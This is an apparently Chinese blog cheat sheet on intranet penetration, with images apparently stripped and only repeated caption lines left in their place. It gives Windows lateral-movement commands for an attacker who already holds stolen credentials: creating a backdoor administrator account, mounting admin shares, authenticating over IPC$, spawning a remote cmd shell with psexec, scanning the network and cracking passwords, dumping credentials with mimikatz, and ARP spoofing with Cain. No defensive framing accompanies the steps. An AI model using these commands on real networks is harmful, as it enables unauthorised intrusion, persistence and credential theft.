一.获取了账号和密码

1.获取了账号和密码,进行内网碰撞

net user 123 123 /add & net localgroup administrators 123 /add

dir \\192.168.1.1\c$ 

内网渗透技巧

2.获取了账号和密码,进行内网验证

net use \\192.168.1.1\ipc$ "123" /user:"123"

内网渗透技巧

3.获取了账号和密码,获取cmdshell

psexec \\192.168.1.1 -u 123 -p 123 cmd

二.扫描内网

net view

内网渗透技巧

arp -a

内网渗透技巧

三.内网口令扫描

ntscan.exe

内网渗透技巧

内网渗透技巧

netscan.exe

内网渗透技巧

mimikatz.exe

内网渗透技巧

内网渗透技巧

ARP欺骗及cain的使用

内网渗透技巧

内网渗透技巧

内网渗透技巧

内网渗透技巧

内网渗透技巧


相关文章: